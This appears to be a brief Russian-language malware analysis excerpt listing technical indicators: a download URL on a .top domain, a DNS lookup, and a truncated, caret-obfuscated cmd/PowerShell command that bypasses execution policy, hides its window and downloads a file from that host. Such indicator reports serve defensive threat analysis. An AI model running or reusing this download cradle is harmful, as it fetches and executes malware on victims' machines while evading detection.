Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poW^E^Rs^h^Ell^.^exe ^-^ExeCU^tIONpoli^C^y^ byPA^SS -^n^oprofIle^ ^-win^DO^wSTYLe h^IdDe^N ^(ne^w^-^ObJEc^t^ sYsTEm.neT.^W^EBCL^I^ENt)^.Do^WnLoadFiLE('http://www.zonedo...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "poW^E^Rs^h^Ell^.^exe ^-^ExeCU^tIONpoli^C^y^ byPA^SS -^n^oprofIle^ ^-win^DO^wSTYLe h^IdDe^N ^(ne^w^-^ObJEc^t^ sYsTEm.neT.^W^EBCL^I^ENt)^.Do^WnLoadFiLE('http://www.zonedo...' (со скрытым окном)